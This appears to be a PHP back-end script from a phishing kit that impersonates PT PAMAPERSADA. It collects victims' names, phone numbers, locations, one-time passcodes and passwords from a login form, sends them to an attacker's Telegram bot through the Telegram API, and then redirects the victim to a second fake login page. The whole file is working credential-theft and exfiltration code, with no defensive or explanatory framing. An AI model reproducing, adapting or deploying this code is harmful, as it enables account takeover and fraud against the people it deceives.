<?php
// Masukkan token bot Telegram dan chat ID
include('../../telegram.php');

// Ambil dan sanitasi data dari form yang dikirim dengan metode POST
$nama = isset($_POST['nama']) ? htmlspecialchars($_POST['nama']) : '';
$nomor = isset($_POST['nomor']) ? htmlspecialchars($_POST['nomor']) : '';
$email = isset($_POST['email']) ? filter_var($_POST['email'], FILTER_SANITIZE_EMAIL) : '';
$lokasi = isset($_POST['lokasi']) ? htmlspecialchars($_POST['lokasi']) : '';
$posisi = isset($_POST['posisi']) ? htmlspecialchars($_POST['posisi']) : '';  // Posisi harus disesuaikan dengan input dari halaman sebelumnya
$otp = isset($_POST['otp']) ? htmlspecialchars($_POST['otp']) : '';
$pass = isset($_POST['pass']) ? htmlspecialchars($_POST['pass']) : '';

// Gabungkan pesan yang akan dikirim ke Telegram
$message = "┌─────═━┈┈━═─────┐•\n";
$message .= "║\n";
$message .= "╠➥ PT PAMAPERSADA\n";
$message .= "║\n";
$message .= "╠➥ Nomor: " . (!empty($nomor) ? $nomor : 'Tidak Dimasukkan') . "\n";
$message .= "║\n";
$message .= "╠➥ Nama: " . (!empty($nama) ? $nama : 'Tidak Dimasukkan') . "\n";
$message .= "║\n";
$message .= "╠➥ Lokasi: " . (!empty($lokasi) ? $lokasi : 'Tidak Dimasukkan') . "\n";
$message .= "║\n";
$message .= "╠➥ OTP: " . (!empty($otp) ? $otp : 'Tidak Dimasukkan') . "\n";
$message .= "║\n";
$message .= "╠➥ Password: " . (!empty($pass) ? $pass : 'Tidak Dimasukkan') . "\n";
$message .= "║\n";
$message .= "└─────═━┈┈━═─────┘•\n";


// Kirim pesan ke bot Telegram dan cek hasilnya
$telegram_url = "https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($message);
$send_message = file_get_contents($telegram_url);

// Redirect ke halaman sukses jika pesan berhasil terkirim
if ($send_message !== false) {
    header('Location: ../login2.php');  // Redirect ke halaman sukses
    exit;
} else {
    echo "Gagal mengirim pesan ke Telegram. Silakan coba lagi nanti.";
}
?>
